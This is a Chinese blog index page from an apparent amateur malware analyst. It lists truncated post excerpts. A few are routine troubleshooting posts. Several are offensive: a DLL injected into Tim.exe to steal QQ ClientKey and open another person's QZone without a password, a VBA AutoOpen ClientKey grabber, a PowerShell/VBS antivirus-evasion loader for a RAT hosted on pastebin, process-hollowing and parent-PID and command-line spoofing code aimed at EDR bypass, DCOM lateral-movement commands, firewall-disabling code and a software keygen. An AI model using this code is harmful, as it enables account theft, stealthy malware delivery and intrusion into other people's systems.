心情杂货铺
关注
分享
扫一扫
FFE4
业余病毒分析
展开
-
完美解决Setup has encountered an error(system file time out of sync,error code is 800b0101)
在vmware上安装基于泄露windows源码的windows server 2003 iso文件过程中出现错误,根据提示信息得知bios中时间有问题导致安装过程终止;后面尝试将日期修改成2003年的时间也不行尝试试用重新创建一个虚拟机,选择试用空硬盘安装,而不是直接用iso文件从cd安装;因为是空硬盘,在格式化硬盘过程中会提示一些信息,从提示信息中得知安装的iso镜像是试用版;因此猜测可能需要将bios中的时间改成编译iso的那一天,于是将时间改成2020-11-19后,成功开始安装系统了原创 2021-06-23 15:53:33 · 2280 阅读 · 0 评论 -
host key for (ip地址) has changed and you have requested strict checking
五一小长假复工了,上班第一天发现我的git更新不了最新的代码,并提示git服务器的dns变了。尝试了网上的方法 ssh-keygen -R “新IP” 不好使。。最后将用户目录下的:C:\Users\《username》.ssh\known_hosts 文件删掉就好了...原创 2020-05-06 15:49:56 · 1305 阅读 · 2 评论 -
javascript shellcode to c shellcode
分析脚本类的shellcode时,需要转成C版本的,更方便调试一些为此写了一个010editor脚本,一键转换#define TITLE "js-shellcode-to-c"void Main(void){ int iIter; int iStart; int iSize; string sToClipboard; string sTemp...原创 2020-03-24 18:56:21 · 786 阅读 · 1 评论 -
调试.net样本反射加载dll并动态Invoke函数
一个.net的窗口程序,内嵌了两个资源,分别是:LAN_Core (.net dll程序,用于解密png中的assembly)ESgFXCQfRbAmmGdIaVSZ.png (用图片隐写技术嵌入了另一个.net程序)主程序通过调用LAN_Core的f20方法,将自身资源png图片传入这里的MyProperty 其实就是ESgFXCQfRbAmmGdIaVSZ.png的资源名...原创 2020-03-20 17:24:30 · 673 阅读 · 0 评论 -
bt汇编指令和_bittest
_bittest函数_bittest(address, bit_offset);这个函数用来检测从address这个地址开始,第bit_offset位是否被置位。反汇编下就是bt指令下面这段代码节选自RPCRT4.DLL中的I_RpcBindingInqLocalClientPID函数,用来校验RpcBindingHandle 是否有效 if ( *((_DWORD *)RpcBindi...原创 2020-03-01 14:34:00 · 3567 阅读 · 0 评论 -
VBA版本获取ClientKey
Sub AutoOpen()'' AutoOpen 宏'On Error GoTo ErrorHandlerSet xmlhttp = CreateObject("WinHttp.WinHttpRequest.5.1") ' Step 1 Get pt_local_tokenxmlhttp.Open "GET", "https://xui.ptlogin2.qq.com/cgi-b...原创 2020-01-02 20:38:11 · 889 阅读 · 1 评论 -
读取QQ ClientKey C++版本
不需要注入,读取QQ ClientKey C++版本#include "stdafx.h"#include<string>#include<windows.h>#include<iostream>#include <WinInet.h>#pragma comment(lib,"wininet.lib")using namespace s...原创 2020-01-02 02:06:51 · 4216 阅读 · 11 评论 -
窃取ClientKey
编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~DLL源码:// dllmain.cpp : 定义 DLL 应用程序的入口点。#include "pch.h"#include <stdio.h>#include <WTypes.h>//...原创 2019-12-31 19:59:42 · 1430 阅读 · 5 评论 -
微信防撤回补丁脚本
之前用od手动patch的微信防撤回补丁,自从微信更新后,就失效了!这次写了个python脚本,一键patch,再也不怕微信更新了!# -*- coding: utf-8 -*-# crucial opcode in wechatwin.dllcrucial_opcode = b"\x8B\x06\x8B\xCE\xFF\x50\x18\x85\xC0\x0F\x84\x31\xFF\xF...原创 2019-12-31 15:49:07 · 1925 阅读 · 0 评论 -
DDE通信研究
作为一个安全研究人员来讲,听到最多关于DDE的东西可能就是office DDE 攻击这种钓鱼攻击手法。为什么只有Office可以进行DDE攻击?有哪些软件默认支持DDE协议?DDE还可以做什么?DDE通信还有其他功能命令,如:动态修改Excel表格内容。本文只针对双击桌面上的xls文件时,Explorer通过DDE将文件路径传给Excel的过程进行研究。1)研究背景大部分Offi...原创 2019-12-24 10:14:38 · 3323 阅读 · 2 评论 -
VS2008创建空项目,一堆报错
前不久刚重装了系统,安装vs2008,配置开发环境,从git上pull下来公司的代码进程编译也没问题!今天用vs创建了一个空的win32控制台项目,编译报了一堆错误,仔细一看报错信息全都是找不到cruntime的函数后来经过排查配置信息,才发现,刚装好vs2008环境时,修改了vs的配置,增加了对SDK7.1的支持,在添加包含目录时,我添加了两个路径:C:\Program Files\M...原创 2019-11-19 16:46:53 · 380 阅读 · 0 评论 -
伪造父进程的另一种方式
创建任意进程,父进程为explorer.exe#include "stdafx.h"#include <windows.h>#include <shlwapi.h>#include <shlobj.h>#pragma comment(lib, "shlwapi.lib")// use the shell view for the desktop...原创 2019-10-31 11:36:59 · 1829 阅读 · 1 评论 -
获取浏览器地址栏URL
#include "stdafx.h"#include <windows.h>#include <MsHTML.h>#include <Exdisp.h>#include <ExDispid.h>#include <comutil.h>//important#pragma comment(lib, "comsuppw.lib"...原创 2019-10-24 09:45:10 · 1318 阅读 · 0 评论 -
IE-8 SafeMode Internal Analysis
袁哥的cve-2014-6332poc脚本中利用构造的读写primitive关掉了IE的SafeMode,由于开启了上帝模式的IE利用VBS脚本来可以直接创建进程、读写文件等。那么到底SafeMode是什么呢?下面反汇编函数,是vbscript引擎用来判断是当前是否运行在安全模式的函数:0: kd> uf vbscript!COleScript::InSafeModevbscript...原创 2019-10-22 19:31:59 · 313 阅读 · 0 评论 -
深夜求助之~CTF
深夜看到网友在群里问php和安全的问题,结果是一道CTF题,打开题目网址,如下图所示:上面代码给出的提示信息,首先接受一个f作为GET参数,然后把f输入的内容当成了一个函数去调用。我们看到有个flag的函数,那直接ctf.com/what_stops_you/index.php?f=flag 不久直接调用这个flag函数,并输出flag了吗?事情肯定没有这么简单! 当我们输入f=flag...原创 2019-10-13 23:28:40 · 381 阅读 · 0 评论 -
Python修改文件往指定行插入内容
需求:批量修改py脚本中的类属性,为类增加一个core = True新的属性a.pyclass A(): description = &quot;abc&quot;现在有一个1.txt文本,保存着需要修改的py文件中含有的description属性。 1.txtdescription = &quot;abc&quot;description = &quot;123&quot;实现思原创 2018-07-11 16:42:37 · 16082 阅读 · 1 评论 -
使用Bochs模拟器和IDA调试MBR
需要环境python2.7IDA 7.0Bochs2.6.9nasm.exe(可选)调试步骤第一步,创建Img文件首先需要安装Bochs模拟器,打开安装目录,运行bximage.exe,选择1,然后一路回车,直到出现Press any key to continue安装目录下会出现一个c.img硬盘镜像文件第二步,将MBR文件,写入IMG文件我这里先使用nasm.exe把...原创 2019-06-02 13:28:36 · 2381 阅读 · 1 评论 -
基于PowerShll的免杀思路,过国外主流杀毒
1) 首先准备一个你的RAT小马,可以是任何exe后缀的文件2)使用工具将exe转换为Base64格式3)将Base64字符串上传到pastebin.com,或者github,得到一个可访问的raw的地址4)将得到的raw地址,替换下面ps代码中的URL,并将该文件保存为Inject to powershell.vbsCreateObject("WScript.Shell").Run "P...原创 2019-06-19 11:00:06 · 1457 阅读 · 0 评论 -
获取进程基址小技巧(傀儡进程)
创建傀儡进程时,一般需要以挂起模式创建进程,然后调用未导出NT函数NtQueryInformationProcess来获取目标进程的PEB地址,拿到PEB地址后,再通过ReadProcessMemory获取目标进程的PEB数据,最后NtUnMapViewOfSection,传入PEB结构中的ImageBaseAddress来卸载目标进程的内存。其实可以直接通过GetThreadContext这个...原创 2019-07-29 15:06:40 · 2069 阅读 · 4 评论 -
创建傀儡进程代码
相比传统的创建傀儡进程的方法,更简单粗暴一些,不用卸载目标进程空间内存。直接利用现有内存进行覆盖写入即可。减少了一些步骤。具体步骤:1.挂起模式创建svchost.exe2.获取进程入口点3.将shellcode写到入口点4.恢复线程执行#include "stdafx.h"#include <windows.h>#include <Winternl.h>...原创 2019-07-29 15:32:14 · 2080 阅读 · 1 评论 -
Win7x64通过ClientLoadLibrary注入DLL
测试程序cpp文件:// ClientLoadlibrary.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include <windows.h>typedef struct _CLientLoadLibraryParam{ DWORD dwSize;//+0 DWORD dwStringLength; //+4...原创 2019-08-04 17:52:41 · 933 阅读 · 0 评论 -
企业内网渗透横向攻击的一种思路
以前老东家有个员工不小心点开了Emotet木马,不久后,全体员工收到了一封带有病毒附件的钓鱼邮件,发件人账号正式该员工的邮件账户。最近在看Black Hat USA 2019大会 第一天的PPT,其中一篇主题《us-19-Joly-Hunting-For-Bugs-Catching-Dragons.pdf》里面介绍了使用C#调用Outlook的COM库,并以当前登陆邮件账户,给指定邮箱发送邮件...原创 2019-08-09 12:59:55 · 2316 阅读 · 0 评论 -
使用Outlook的CreateObject方法和DotNetToJScript横向渗透
原理:通过powershell调用Outlook的DCOM组件,可以执行js脚本,原文中的demo是结合DotNetToJScript框架+C#程序来做的,我这里比较懒,直接用js写的脚本。由于是COM调用,所以进程链关系不会关联到powershell。通过Process Monitor等工具也监控不到相关日志。运行效果图:Powershell代码:$com = [Type]::GetT...原创 2019-08-26 19:15:52 · 675 阅读 · 0 评论 -
使用DCOM对象的ExecuteShellCommand方法执行系统命令
[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","这里替换成你的IP")).Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0")效果:参考链接:https://ha...原创 2019-08-29 13:41:31 · 1248 阅读 · 0 评论 -
使用命令行提取微软补丁文件
使用命令行提取msu/msp/msi/exe文件Microsoft Hotfix Installer (.exe)setup.exe /t:C:<target_dir> /cMicrosoft Update Standalone Package (.msu)expand -F:* update.msu C:<target_dir>cd <target_dir...原创 2019-05-16 14:30:26 · 3123 阅读 · 0 评论 -
将shellcode隐在BitNumber结构中
聪明的攻击者一般会将shellcode加密后在放入样本中,运行前解密出来!比如JavascriptToDoNet,生产的js版本的.netdll其中会用到base64->des 两层加密。其实利用C#的BigInteger结构,就可以对shellcode进行简单加密。使用时,再讲数字转回来就行了:样本Hash:ed6d53f98103db6420cf82bd642ab473fb7...原创 2019-05-14 15:21:25 · 468 阅读 · 0 评论 -
SouceInsight v4 注册机源码
下面c++代码可以用来生成Source Insight v4.0的注册码,网络验证还需要各位自己去patch一下!~#include "stdafx.h"#include <windows.h>int main(){ byte serial_table[] = { 0x4b, 0x56, 0x39, 0x36, 0x47, 0x4d, 0x4a, 0x59, 0x48, ...原创 2018-09-22 20:57:22 · 4935 阅读 · 0 评论 -
sb csdn
刚写玩python习惯了用单引号定义字符串变量,导致我在使用git命令提交的时候,也使用了单引号 git commit -m ‘fix something’git直接给我报错了,错误内容 : pathspec 'fix' did not match any file(s) known to git改成双引号后就好了。...原创 2018-08-01 17:57:50 · 225 阅读 · 0 评论 -
python从文件读取URL,导致爬虫失败
需求:从文件中逐行读取md5字符串,作为URL参数抓取某个接口返回的内容,并保存到数据库。问题:接口返回请求参数错误,经过对比发现直接在URL中写死MD5参数就没问题,数据正常返回。解决过程:1.首先排除了从文件中读取的字符串,和直接写的字符串编码不同的问题。 2.后面想到txt文件之前也是用python脚本生成的,生成txt文件的时候再每一行加了\n换行符,尝试剔除\n换行符,结果...原创 2018-07-06 11:31:21 · 958 阅读 · 0 评论 -
ubuntu16.04TLSi386在Vmware安装后vm-tools按钮灰色
这个问题,网上找了几个答案,但是都不是很标准,可能针对每个人当时的虚拟机设置信息有关系。我遇到的问题: 在VMware中安装完unbuntu后发现VMware菜单中的安装VmTools按钮是灰色的网上找了几个答案,说要挂载ubuntu镜像的CD-ROM。我当时的情况确实没有挂载cd-rom,但是我挂载后也没什么用,只有安装镜像里面的文件。后来我发现原来是没有添加软盘的原因。解...原创 2018-07-05 11:12:22 · 1094 阅读 · 0 评论 -
C++ 开启,查看远程3389端口
最近写一个小demo测试我写的沙箱规则,目的是监控木马程序修改注册表3389的开关,以及修改远程桌面端口。 很长时间不使用注册表的API了,读取注册表的时候没有问题,后来想添加一个设置注册表的,也就是写注册表,发现添加了KEY_WRITE权限后,RegOpenKeyEx函数一直返回失败,经过调试,原来是没有管理员运行权限。#include "stdafx.h"#include <wi...原创 2018-06-08 10:41:54 · 1210 阅读 · 0 评论 -
使用注册表关闭Windows防火墙
#include "stdafx.h"#include <windows.h>int _tmain(int argc, _TCHAR* argv[]){ HKEY hKey = nullptr; LONG lRet = NULL; char* szSubkey = "SYSTEM\\CurrentControlSet\\services\\Shared...原创 2018-06-11 15:41:12 · 6849 阅读 · 4 评论 -
DbgView远程调试
首先保证A和B在同一网段,可以互相ping通。原创 2018-04-18 10:16:45 · 911 阅读 · 0 评论 -
Vmware Fosion 提示“File not found”
最近一段时间我的虚拟机打开时会先提示一个“file not found“的弹窗,点击确定后,虚拟机正常启动!网上寻找解决方案,先是csdn上一位博主,提供的解决方案是重新安装VMware..让我很无语。后面看到StackoverFlow上也有人提出了相同的问题,推荐重装vm的系统。。下面其他回答是先把虚拟机从Library中移除,但不从磁盘删除,再重新添加,我感觉这个操作比较靠谱,于是...原创 2018-03-27 08:35:57 · 3268 阅读 · 0 评论 -
使用GetActiveWindow函数获取当前窗口HWND句柄
今天看到一段代码,大概是这样的MessageBox(GetActiveWindow(),"test","content",0);调用了一个MessageBox函数,第一个参数传入的是GetActiveWindow函数,我们知道一般第一个参数写NULL或者窗口句柄,那么猜测GetActiveWindow是用来获取当前窗口句柄的经过查询msdn果然是,返回窗口句柄HWND WINA...原创 2018-03-20 22:45:52 · 4306 阅读 · 0 评论 -
病毒分析常用技巧-修复内存dump文件
病毒常用的技俩之一就是创建一个傀儡进程,借助傀儡进程,执行自己的恶意代码。其实现方法:1.以挂起方式创建一个进程2.写入一个PE文件到这个挂起的进程的内存,可能会使用API WriteProcessMemory或MapViewOfSection那一套API来完成这个操作3.调用ResumeThread恢复进程执行对付这种我们可以在它写入数据到目标进程时下断点,例如WriteProcess...原创 2018-11-13 16:41:33 · 4048 阅读 · 0 评论 -
OD无法下断点
提示 “无法在断点(可能无效)地址XXXXXXXX 读取寄存器以及更新EIP”点确定后就崩溃了,查看崩溃模块发现是E_Junk_Code.dll这个插件导致的将插件删除后,OD不崩溃了,但还是出现那个错误弹窗。把所有插件都删掉就好了。。...原创 2019-01-04 17:44:20 · 2163 阅读 · 0 评论 -
按照指定日期,遍历磁盘下被修改过的文件
最近一次应急响应中,客户中了勒索病毒,提取了一些可疑文件,但是没有发现勒索病毒母体,通过可疑样本的文件创建时间,最终找到了病毒母体的位置。下面这条cmd命令用来扫描C盘下指定时间被修改过的exe文件:forfiles /m *.exe /d +2019/10/20 /s /p c:\ /c "cmd /c echo @path @fdate @ftime" 2>nul...原创 2019-04-25 15:53:01 · 564 阅读 · 1 评论 -
Abuse process command line
这招可以用来bypass一些EDR监控创建进程时的命令行参数。例如创建cmd进程时指定的参数是 wmic xxxx但其实真实执行的是其他命令,powershell同理#include "stdafx.h"#include <windows.h>#include <winternl.h>typedef NTSTATUS(WINAPI *_NtQueryInfo...原创 2019-04-29 18:44:25 · 545 阅读 · 0 评论 -
创建进程时指定父进程
创建进程时为创建的进程指定父进程,可以用来破坏进程链,加大溯源难度,而且用procmon也抓不到日志#include "stdafx.h"#include "windows.h"#include <intrin.h>#include <TlHelp32.h>DWORD GetProcessIDFromName(WCHAR * name){ PROCESS...原创 2019-04-29 18:38:02 · 3549 阅读 · 0 评论